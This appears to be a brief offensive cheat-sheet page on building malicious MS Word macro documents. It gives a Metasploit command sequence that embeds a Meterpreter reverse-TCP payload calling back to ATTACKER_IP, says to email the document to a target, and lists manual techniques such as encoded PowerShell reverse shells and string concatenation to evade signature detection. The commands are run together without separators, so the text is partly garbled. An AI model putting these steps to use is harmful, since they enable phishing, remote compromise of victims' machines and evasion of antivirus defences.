MS Word Malicious Macro Document Creation
Example tool to create infected documents:
1) Metasploit
Usage:
msfconsoleset payload windows/meterpreter/reverse_tcpuse exploit/multi/fileformat/office_word_macroset LHOST ATTACKER_IPset LPORT ATTACKER_PORTshow optionsexploit
The word document with the embedded macro will be stored in:
Then, send the malicious document via email (for example) to your target and wait for them to open it. Then profit
Manual Macros
1) Auto-Executing Powershell on Document Open
2) Passing Command as a String Variable
3) Macro for PowerShell Reverse Shell using Encoded Command
4) String Concatenation to Bypass Signature Detection
5) Executing Encoded Commands without Direct PowerShell reference
6) Callback ping
7) Determine target architecture
8) Macro using powershell
Last updated